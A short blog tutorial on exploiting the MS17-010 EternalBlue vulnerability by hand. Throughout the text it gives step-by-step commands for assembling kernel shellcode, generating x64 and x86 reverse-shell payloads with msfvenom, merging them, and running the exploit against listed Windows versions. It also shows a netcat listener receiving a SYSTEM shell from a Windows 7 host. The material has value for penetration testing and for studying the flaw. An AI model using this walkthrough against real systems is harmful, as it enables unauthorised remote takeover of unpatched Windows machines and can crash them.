MS17-010 EternalBlue Manual Exploitation

3 minute read Modified:

Exploiting MS17-010 the manual way.

For educational purposes only

There may be times when you want to exploit MS17-010 (EternalBlue) without having to rely on using Metasploit. Perhaps you want to run it from a ‘Command & Control’ system without msf installed, run a quick demo or execute on the go. Unlike “zzz_exploit”, this method does not require access to a named pipe, nor does it require any credentials. The downside, however, is an increased risk of crashing the target. Kudos to Worawit Wang for making this easy.

Start by cloning the following repository:

$ git clone

The shellcode directory holds (you guessed it) the kernel shellcodes.

$ ls -l MS17-010/shellcode/
total 44
-rw-r--r-- 1 root root 20305 Dec  2 22:03 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Dec  2 22:03 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root  1589 Dec  2 22:03

The first step is to assemble shellcode to binary. You can do either one (depending which architecture your target is running), or assemble both and merge them to a single binary file. The latter is useful when you don’t know the target arch or if you are planning to run it against multiple systems with different architectures.

x64 shellcode

Assemble kernel shellcode with nasm:

$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

Generate a binary payload or use an existing one. Name this sc_x64_payload.bin:

$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST= --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: sc_x64_payload.bin

Concentrate payload & shellcode:

$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

x86 shellcode

Assemble kernel shellcode with nasm:

$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

Generate a binary payload or use an existing one. Name this sc_x86_payload.bin:

$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST= --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: sc_x86_payload.bin

Concentrate payload & shellcode:

$ cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

Merging binaries

This step is only necessary when you want both x64 and x86 in the same binary. Assuming that you followed the steps above for each architecture; merging is done with the included script:

$ python MS17-010/shellcode/ sc_x86.bin sc_x64.bin sc_all.bin


The eternalblue scripts are located in MS17-010/ and have the following targets.

  • Windows Server 2008 & R2
  • Windows Server 2012 & R2 (x86)
  • Windows Server 2016 (x64)
  • Windows Vista
  • Windows 7

  • Windows Server 2012 (x64)
  • Windows 8.1 & RT
  • Windows 10 (x64) (build < 14393)

Running exploit

Word of advice; running these blindly against the target is a bad idea. Be sure to enumerate the OS first. Also, expect your target to crash or force a reboot once the session is closed.

Example running against vulnerable Windows 7 host:

$ python MS17-010/ sc_all.bin
$ nc -lvnp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 49191
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system